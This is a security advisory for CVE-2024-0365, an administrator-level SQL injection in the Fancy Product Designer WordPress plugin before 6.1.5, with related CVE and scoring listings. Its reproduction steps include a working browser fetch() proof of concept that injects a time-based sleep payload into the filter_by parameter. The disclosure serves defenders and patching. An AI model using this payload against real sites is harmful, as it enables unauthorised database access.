Lucene search
Ivan SpiridonovWPEX-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18HistoryFeb 20, 2024 - 12:00 a.m.
Fancy Product Designer < 6.1.5 - Admin+ SQL Injection
2024-02-2000:00:00
Ivan Spiridonov
26
fancy product designer
admin login
catalog product
sql injection
security exploit
nonce-based fetch
Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.
- Log in as an administrator, and visit /wp-admin/.
- Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer
- Search for "fpd_dismiss_notification" in the page's source, note down the associated nonce
- Send the following fetch() command in your browser's console, and replace $NONCE with the nonce:
```
fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&filter_by=ID%2c(select*from(select(sleep(20)))a)&sort_by=ASC&page=1&type=catalog').then(x=>x.text()).then(x=>console.log(x))
```
Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.Related
cvelist
cvelist
CVE-2024-0365 Fancy Product Designer < 6.1.5 - Admin+ SQL Injection
2024-03-18 19:05:42
cve
cve
CVE-2024-0365
2024-03-18 19:15:06
nvd
nvd
CVE-2024-0365
2024-03-18 19:15:06
wpvulndb
wpvulndb
Fancy Product Designer < 6.1.5 - Admin+ SQL Injection
2024-02-20 00:00:00
7.4 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18